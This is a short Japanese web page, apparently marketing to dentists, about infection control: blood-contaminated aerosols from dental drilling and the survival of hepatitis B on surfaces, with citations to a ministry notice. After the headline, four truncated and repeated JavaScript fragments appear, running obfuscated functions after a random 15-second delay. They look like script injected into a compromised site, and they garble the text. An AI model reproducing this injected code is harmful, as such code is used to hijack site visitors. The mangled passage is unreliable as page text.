院内感染対策をお考えの歯科医院の先生へ!andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

治療室のエアロゾル・院内感染・・・心配ではありませんか?


歯科治療は回転切削器具を使うため、血液で汚染されたエアロゾルや

微生物を含んだ切削粉塵が診察室に飛散しています。

実際に「無吸引の場合約2m四方の範囲まで飛沫汚染が 及んだ

という報告もあります。(歯科医療機関における院内感染対策について、医政歯発0604号)

血液中に含まれるB型肝炎ウィルスは、乾燥状態で1週間経過しても感染力を持つことが

動物実験で報告されており、実際に衣服や環境表面に付着した血液からの感染が疑われた症例報告もあります。

(歯科医療機関における院内感染対策について、医政歯発0604号)